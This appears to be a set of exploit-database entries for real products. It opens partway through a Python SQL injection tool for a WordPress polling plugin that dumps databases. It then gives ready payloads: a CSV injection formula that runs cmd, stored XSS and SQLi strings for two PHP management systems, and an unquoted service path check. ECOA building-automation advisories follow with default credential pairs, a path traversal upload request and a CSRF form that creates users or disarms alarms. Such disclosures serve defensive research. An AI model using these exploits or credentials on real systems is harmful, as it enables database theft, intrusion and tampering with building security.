'wp_sap': inject_payload, } print("\r\n"+colored("Sending Payload :",'red')+" %s\r\n" %colored((inject_payload),'green')) response = request.get(url,cookies=cookies) warnings.filterwarnings("ignore", category=UserWarning, module='bs4') soup = BeautifulSoup(response.text,features="lxml") cdata = soup.find(text=re.compile("CDATA")) split_cdata = list(cdata.split(':')) output = split_cdata[11] print("\r\n"+colored("SQLI OUTPUT :",'red')+" %s\r\n" %colored((output),'green')) time.sleep(1) main() def main(): print ("Automated SQL Injector (wp-survey-and-poll)") print ("Enter the respective number to select option") print ("#EXAMPLE Option : 1\r\n") print("Option 1 : Grab Database Version") print("Option 2 : Get Current Database Name") print("Option 3 : Get Hostname ") print("Option 4 : Get Current User") print("Option 5 : List All Databases") print("Option 6 : List Tables From Database") print("Option 7 : List Columns from Tables") print("Option 8 : Dump Database") print("Option 9 : Custom Payload") print("Option 10 : Exit") print("\r\n") option_selected = str(input("Select Option : ")) if(option_selected=="1"): db_version() if(option_selected=="2"): currect_db_name() if(option_selected=="3"): hostname() if(option_selected=="4"): current_user() if(option_selected=="5"): list_databases() if(option_selected=="6"): list_tables_db() if(option_selected=="7"): list_columns_db() if(option_selected=="8"): dump_db() if(option_selected=="9"): custom_payload() if(option_selected=="10"): sys.exit() else: main() main()

# Exploit Title: WordPress Plugin TablePress 1.14 - CSV Injection # Date: 07/09/2021 # Exploit Author: Nikhil Kapoor # Vendor Homepage: # Software Link: https://wordpress.org/plugins/tablepress/ # Version: 1.14 # Category: Web Application # Tested on Windows How to Reproduce this Vulnerability: 1. Install WordPress 5.8.0 2. Install and activate TablePress 3. Navigate to TablePress >> Add New >> Enter Table Name and Description (If You want this is Optional) >> Select Number of Rows and Columns 4. Click on Add Table 5. Now in Table Content Input Field Enter CSV Injection Payload 6. Click on Save Changes 6. Now go to All Table in TablePress select our entered table >> Click on Export >> Select CSV as an Export Format. 7. Click on Download Export File 8. Open the exported CSV file you will see that CSV Injection got Successfully Executed. Payload Used :- @SUM(1+9)*cmd|' /C calc'!A0

# Exploit Title: Bus Pass Management System 1.0 - 'adminname' Stored Cross-Site Scripting (XSS) # Date: 2021-09-08 # Exploit Author: Emre Aslan # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip # Version: 1.0 # Tested on: Windows 11 - XAMPP Server # Vulnerable page: host/admin/* # Vulnerable Code: <div class="user-info"><div><strong>Admin[PAYLOAD]</strong></div> # Vulnerable Parameter: adminname[ POST Data ] # Tested Payload: <svg/onload=alert('XSS')> # Proof Of Concept: # 1 - Login the dashboard # 2 - Go to /admin/admin-profile.php # 3 - set admin name with payload # 4 - xss fires

# Exploit Title: Active WebCam 11.5 - Unquoted Service Path # Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker # Date: 09.09.2021 # Software Link: https://www.techspot.com/downloads/175-active-webcam.html # Vendor Homepage: https://www.pysoft.com/ # Version: 11.5 # Tested on: Windows 10 # Note: "Start on Windows Startup" with "Start as Service" must be enabled in Program Options # Proof of Concept: C:\Users\death>sc qc ACTIVEWEBCAM [SC] QueryServiceConfig SUCCESS SERVICE_NAME: ACTIVEWEBCAM TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Active WebCam\WebCam.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Active WebCam DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\death>cmd /c wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ Active WebCam ACTIVEWEBCAM C:\Program Files\Active WebCam\WebCam.exe Auto

# Exploit Title: Men Salon Management System 1.0 - Multiple Vulnerabilities # Date: 2021-09-09 # Exploit Author: Aryan Chehreghani # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/men-salon-management-system-using-php-and-mysql # Version: 1.0 # Tested on: Windows 10 - XAMPP Server # Vulnerable page : http://localhost/msms/admin/edit-customer-detailed.php?editid= # Proof Of Concept : # 1 . Download And install [ Men Salon Management System ] # 2 . Go to /msms/admin/index.php and Enter Username & Password # 3 . Navigate to >> Customer List # 4 . In the action column, click Edit # 5 . Enter the payload into the Url and Fields # [ Sql Injection ] : Vulnerable paramater : The editid paramater is Vulnerable to sqli GET : http://localhost/msms/admin/edit-customer-detailed.php?editid=2'+union+select+1,database(),3,4,5,6,7,8--+ # [ Stored Cross-Site Scripting ] : Vulnerable Fields : Name & Email Payload Used: "><script>alert(document.cookie)</script>

# Exploit Title: ECOA Building Automation System - Weak Default Credentials # Date: 25.06.2021 # Exploit Author: Neurogenesia # Vendor Homepage: http://www.ecoa.com.tw ECOA Building Automation System Weak Default Credentials Vendor: ECOA Technologies Corp. Product web page: http://www.ecoa.com.tw Affected version: ECOA ECS Router Controller - ECS (FLASH) ECOA RiskBuster Terminator - E6L45 ECOA RiskBuster System - RB 3.0.0 ECOA RiskBuster System - TRANE 1.0 ECOA Graphic Control Software ECOA SmartHome II - E9246 ECOA RiskTerminator Summary: #1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are designed to provide you with the latest in the Human Machine Interface (HMI) technology, for completely monitoring and controlling management. It may be used singly for small and medium sized facilities, could be linked together via the high-speed Ethernet to other servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more sophisticated applications. The Risk-Terminator practice Web basic conception that with operation simply and conveniently, totally share risk and make sure of security. Even remote sites may be controlled and monitored through Ethernet port, which base on standard transferring protocol like XML, Modbus TCP/IP or BACnet or URL. #2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP networking technologies. It incorporates an embedded web server that can deliver user-specific web pages to any PC or mobile terminal running internet browser software. A user with an appropriate security codes can made adjustment or monitor the network control unit form any internet access point in the world. It also provides network management, integration and process control functions for any existing or new building controllers and microprocessor based equipments or system in buildings. The management function provided by the RiskBuster such as trend log and alarm generation improves building controllers and microprocessor based equipments or system management and audit trail capabilities. The integration function provided by the RiskBuster allows seamless integration such as information sharing (read/write) between building controllers and microprocessor based equipments or system without any need of major upgrade or equipments replacement and allow cost saving. The process control functions provided by the RiskBuster allow global control action to be implemented across any building controllers and microprocessor based equipments or system to allow full building control. The RiskBuster provide a truly cost effective solution for any building automation or high level integration application. A truly Ethernet network compliant feature allows the RiskBuster to be install anywhere in the building. #3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for Building Automate System; Environment control system; HVAC control system and other types of equipment. Being fully programmable it ensures complete application versatility, allowing specific products to be created according to customer requests. This controller is a configurable unitary controller based on the 32bit series microcomputer, with an on-board clock, have two RS-485 local bus. #4 The ECS0000160 is a Router Controller for building and industry products based on various microprocessors. It not only accessing information but also monitoring and controlling across Internet directly. The ECS0000160 can totally replace and improve a typical system that always has tedious panel and complex working process. An obviously benefit to our customers is that ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed to connect with singular specific operating system. It's like a whole package, which provides browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all through web-pages operating, which works base on standard transmission Internet protocol. The ECS0000160 provides a low industry cost. A truly friendly network interface which is simple and easy to apply on factory floors. It supports from serial ports with options of RS485. #5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, integral and differential (P+I+D) and dead-zone control to control accurately. The controller features contains the sensing system, proportional control systems, computing modules, control modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, air monitoring, lighting and power control, the use of premises for buildings, factories, offices, conference rooms, restaurants, hotels, etc. Desc: The BAS controller uses weak set of default administrative credentials that can be easily guessed in remote password attacks and gain full control of the system. Tested on: EMBED/1.0 Apache Tomcat/6.0.44 Apache Tomcat/6.0.18 Windows Server MySQL Version 5.1.60 MySQL Version 4.0.16 Version 2.0.1.28 20180628 Vulnerability discovered by Neurogenesia @zeroscience Advisory ID: ZSL-2021-5668 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5668.php 25.06.2021 -- Default / Weak Credentials -------------------------- - Attacker can use default credentials and authenticate to the SmartHome, Building Automation and Access Control System. Credentials: guest:guest user:user admin:admin root:embed embed:power administrator:empty humex:humex4377 ecoa:ecoa4377

# Exploit Title: ECOA Building Automation System - Path Traversal Arbitrary File Upload # Date: 25.06.2021 # Exploit Author: Neurogenesia # Vendor Homepage: http://www.ecoa.com.tw ECOA Building Automation System Path Traversal Arbitrary File Upload Vendor: ECOA Technologies Corp. Product web page: http://www.ecoa.com.tw Affected version: ECOA ECS Router Controller - ECS (FLASH) ECOA RiskBuster Terminator - E6L45 ECOA RiskBuster System - RB 3.0.0 ECOA RiskBuster System - TRANE 1.0 ECOA Graphic Control Software ECOA SmartHome II - E9246 ECOA RiskTerminator Summary: #1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are designed to provide you with the latest in the Human Machine Interface (HMI) technology, for completely monitoring and controlling management. It may be used singly for small and medium sized facilities, could be linked together via the high-speed Ethernet to other servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more sophisticated applications. The Risk-Terminator practice Web basic conception that with operation simply and conveniently, totally share risk and make sure of security. Even remote sites may be controlled and monitored through Ethernet port, which base on standard transferring protocol like XML, Modbus TCP/IP or BACnet or URL. #2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP networking technologies. It incorporates an embedded web server that can deliver user-specific web pages to any PC or mobile terminal running internet browser software. A user with an appropriate security codes can made adjustment or monitor the network control unit form any internet access point in the world. It also provides network management, integration and process control functions for any existing or new building controllers and microprocessor based equipments or system in buildings. The management function provided by the RiskBuster such as trend log and alarm generation improves building controllers and microprocessor based equipments or system management and audit trail capabilities. The integration function provided by the RiskBuster allows seamless integration such as information sharing (read/write) between building controllers and microprocessor based equipments or system without any need of major upgrade or equipments replacement and allow cost saving. The process control functions provided by the RiskBuster allow global control action to be implemented across any building controllers and microprocessor based equipments or system to allow full building control. The RiskBuster provide a truly cost effective solution for any building automation or high level integration application. A truly Ethernet network compliant feature allows the RiskBuster to be install anywhere in the building. #3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for Building Automate System; Environment control system; HVAC control system and other types of equipment. Being fully programmable it ensures complete application versatility, allowing specific products to be created according to customer requests. This controller is a configurable unitary controller based on the 32bit series microcomputer, with an on-board clock, have two RS-485 local bus. #4 The ECS0000160 is a Router Controller for building and industry products based on various microprocessors. It not only accessing information but also monitoring and controlling across Internet directly. The ECS0000160 can totally replace and improve a typical system that always has tedious panel and complex working process. An obviously benefit to our customers is that ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed to connect with singular specific operating system. It's like a whole package, which provides browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all through web-pages operating, which works base on standard transmission Internet protocol. The ECS0000160 provides a low industry cost. A truly friendly network interface which is simple and easy to apply on factory floors. It supports from serial ports with options of RS485. #5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, integral and differential (P+I+D) and dead-zone control to control accurately. The controller features contains the sensing system, proportional control systems, computing modules, control modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, air monitoring, lighting and power control, the use of premises for buildings, factories, offices, conference rooms, restaurants, hotels, etc. Desc: The BAS controller suffers from an arbitrary file write and directory traversal vulnerability. Using the POST parameters 'rbt' and 'filename', attackers can set arbitrary values for location and content type and gain the possibility to execute arbitrary code on the affected device. Tested on: EMBED/1.0 Apache Tomcat/6.0.44 Apache Tomcat/6.0.18 Windows Server MySQL Version 5.1.60 MySQL Version 4.0.16 Version 2.0.1.28 20180628 Vulnerability discovered by Neurogenesia @zeroscience Advisory ID: ZSL-2021-5669 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5669.php 25.06.2021 -- Directory Traversal / File Path Traversal / Unrestricted File Upload -------------------------------------------------------------------- - Abusing the 'filename' and 'rbt' POST parameter, attacker can navigate outside current directory and write files in arbitrary location. - There is no validation on file content, file extension and file location. Request: POST /ebd-bin/upload HTTP/1.1 Host: 192.168.1.3:8080 ------WebKitFormBoundaryvxy2zFDs1Z69pfRB Content-Disposition: form-data; name="rbt" ecsfile ------WebKitFormBoundaryvxy2zFDs1Z69pfRB Content-Disposition: form-data; name="filename"; filename="../../../anyfile.ext" Content-Type: application/octet-stream ANY_CONTENT_HERE ------WebKitFormBoundaryvxy2zFDs1Z69pfRB--

# Exploit Title: ECOA Building Automation System - Directory Traversal Content Disclosure # Date: 25.06.2021 # Exploit Author: Neurogenesia # Vendor Homepage: http://www.ecoa.com.tw ECOA Building Automation System Directory Traversal Content Disclosure Vendor: ECOA Technologies Corp. Product web page: http://www.ecoa.com.tw Affected version: ECOA ECS Router Controller - ECS (FLASH) ECOA RiskBuster Terminator - E6L45 ECOA RiskBuster System - RB 3.0.0 ECOA RiskBuster System - TRANE 1.0 ECOA Graphic Control Software ECOA SmartHome II - E9246 ECOA RiskTerminator Summary: #1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are designed to provide you with the latest in the Human Machine Interface (HMI) technology, for completely monitoring and controlling management. It may be used singly for small and medium sized facilities, could be linked together via the high-speed Ethernet to other servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more sophisticated applications. The Risk-Terminator practice Web basic conception that with operation simply and conveniently, totally share risk and make sure of security. Even remote sites may be controlled and monitored through Ethernet port, which base on standard transferring protocol like XML, Modbus TCP/IP or BACnet or URL. #2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP networking technologies. It incorporates an embedded web server that can deliver user-specific web pages to any PC or mobile terminal running internet browser software. A user with an appropriate security codes can made adjustment or monitor the network control unit form any internet access point in the world. It also provides network management, integration and process control functions for any existing or new building controllers and microprocessor based equipments or system in buildings. The management function provided by the RiskBuster such as trend log and alarm generation improves building controllers and microprocessor based equipments or system management and audit trail capabilities. The integration function provided by the RiskBuster allows seamless integration such as information sharing (read/write) between building controllers and microprocessor based equipments or system without any need of major upgrade or equipments replacement and allow cost saving. The process control functions provided by the RiskBuster allow global control action to be implemented across any building controllers and microprocessor based equipments or system to allow full building control. The RiskBuster provide a truly cost effective solution for any building automation or high level integration application. A truly Ethernet network compliant feature allows the RiskBuster to be install anywhere in the building. #3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for Building Automate System; Environment control system; HVAC control system and other types of equipment. Being fully programmable it ensures complete application versatility, allowing specific products to be created according to customer requests. This controller is a configurable unitary controller based on the 32bit series microcomputer, with an on-board clock, have two RS-485 local bus. #4 The ECS0000160 is a Router Controller for building and industry products based on various microprocessors. It not only accessing information but also monitoring and controlling across Internet directly. The ECS0000160 can totally replace and improve a typical system that always has tedious panel and complex working process. An obviously benefit to our customers is that ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed to connect with singular specific operating system. It's like a whole package, which provides browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all through web-pages operating, which works base on standard transmission Internet protocol. The ECS0000160 provides a low industry cost. A truly friendly network interface which is simple and easy to apply on factory floors. It supports from serial ports with options of RS485. #5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, integral and differential (P+I+D) and dead-zone control to control accurately. The controller features contains the sensing system, proportional control systems, computing modules, control modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, air monitoring, lighting and power control, the use of premises for buildings, factories, offices, conference rooms, restaurants, hotels, etc. Desc: The BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter 'cpath' in File Manager (fmangersub), attackers can disclose directory content on the affected device. Tested on: EMBED/1.0 Apache Tomcat/6.0.44 Apache Tomcat/6.0.18 Windows Server MySQL Version 5.1.60 MySQL Version 4.0.16 Version 2.0.1.28 20180628 Vulnerability discovered by Neurogenesia @zeroscience Advisory ID: ZSL-2021-5670 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php 25.06.2021 -- Directory Traversal Content Disclosure -------------------------------------- - Abysing the 'cpath' GET parameter, attackers can disclose directory contents by directory traversal attacks. - cpath=. - cpath=../../../../../../../etc Request: GET /fmangersub?cpath=/ HTTP/1.1 Host: 192.168.1.3:8080 bacevent.elf redown.elf system.bin webnewc.elf err.txt hole.elf modbustcp.elf ianplc.bin hitachi.el bacser.elf root.pem pwsd.bin server.lst symtbl.tbl client.pem gb-unicode.bin httpser.elf namelst.bin AI.tbl BI.tbl AV.tbl BV.tbl mstplalf rthost.elf big5-unicode.bin version.bin modbus.elf rbdev.bin rbdlc.elf powercrd.elf

# Exploit Title: ECOA Building Automation System - 'multiple' Cross-Site Request Forgery (CSRF) # Date: 25.06.2021 # Exploit Author: Neurogenesia # Vendor Homepage: http://www.ecoa.com.tw ECOA Building Automation System Cross-Site Request Forgery Vendor: ECOA Technologies Corp. Product web page: http://www.ecoa.com.tw Affected version: ECOA ECS Router Controller - ECS (FLASH) ECOA RiskBuster Terminator - E6L45 ECOA RiskBuster System - RB 3.0.0 ECOA RiskBuster System - TRANE 1.0 ECOA Graphic Control Software ECOA SmartHome II - E9246 ECOA RiskTerminator Summary: #1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are designed to provide you with the latest in the Human Machine Interface (HMI) technology, for completely monitoring and controlling management. It may be used singly for small and medium sized facilities, could be linked together via the high-speed Ethernet to other servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more sophisticated applications. The Risk-Terminator practice Web basic conception that with operation simply and conveniently, totally share risk and make sure of security. Even remote sites may be controlled and monitored through Ethernet port, which base on standard transferring protocol like XML, Modbus TCP/IP or BACnet or URL. #2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP networking technologies. It incorporates an embedded web server that can deliver user-specific web pages to any PC or mobile terminal running internet browser software. A user with an appropriate security codes can made adjustment or monitor the network control unit form any internet access point in the world. It also provides network management, integration and process control functions for any existing or new building controllers and microprocessor based equipments or system in buildings. The management function provided by the RiskBuster such as trend log and alarm generation improves building controllers and microprocessor based equipments or system management and audit trail capabilities. The integration function provided by the RiskBuster allows seamless integration such as information sharing (read/write) between building controllers and microprocessor based equipments or system without any need of major upgrade or equipments replacement and allow cost saving. The process control functions provided by the RiskBuster allow global control action to be implemented across any building controllers and microprocessor based equipments or system to allow full building control. The RiskBuster provide a truly cost effective solution for any building automation or high level integration application. A truly Ethernet network compliant feature allows the RiskBuster to be install anywhere in the building. #3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for Building Automate System; Environment control system; HVAC control system and other types of equipment. Being fully programmable it ensures complete application versatility, allowing specific products to be created according to customer requests. This controller is a configurable unitary controller based on the 32bit series microcomputer, with an on-board clock, have two RS-485 local bus. #4 The ECS0000160 is a Router Controller for building and industry products based on various microprocessors. It not only accessing information but also monitoring and controlling across Internet directly. The ECS0000160 can totally replace and improve a typical system that always has tedious panel and complex working process. An obviously benefit to our customers is that ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed to connect with singular specific operating system. It's like a whole package, which provides browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all through web-pages operating, which works base on standard transmission Internet protocol. The ECS0000160 provides a low industry cost. A truly friendly network interface which is simple and easy to apply on factory floors. It supports from serial ports with options of RS485. #5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, integral and differential (P+I+D) and dead-zone control to control accurately. The controller features contains the sensing system, proportional control systems, computing modules, control modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, air monitoring, lighting and power control, the use of premises for buildings, factories, offices, conference rooms, restaurants, hotels, etc. Desc: The Building Automation System / SmartHome allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. These actions can be exploited to perform any CRUD operation like user creation, alarm shutdown and account password change with administrative privileges if a logged-in user visits a malicious web site. Tested on: EMBED/1.0 Apache Tomcat/6.0.44 Apache Tomcat/6.0.18 Windows Server MySQL Version 5.1.60 MySQL Version 4.0.16 Version 2.0.1.28 20180628 Vulnerability discovered by Neurogenesia @zeroscience Advisory ID: ZSL-2021-5671 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5671.php 25.06.2021 -- Cross-Site Request Forgery (CSRF) - Add / Modify Users or Disarm Alarm ---------------------------------------------------------------------- - CSRF exist in entire solution for any CRUD operation. PoC: <html> <body> <form action="http://192.168.1.3:8080/usersave" method="POST"> <input type="hidden" name="bk" value="&#45;1" /> <input type="hidden" name="edtText" value="" /> <input type="hidden" name="comText" value="19" /> <input type="hidden" name="delrow" value="" /> <input type="hidden" name="hiddenText" value="user&#1;user&#1;19&#1;&#1;&#2;guest&#1;guest&#1;10&#1;&#1;&#2;root&#1;embed&#1;19&#1;&#1;&#2;admin&#1;admin&#1;19&#1;&#1;&#2;" /> <input type="submit" value="Submit" /> </form> </body> </html>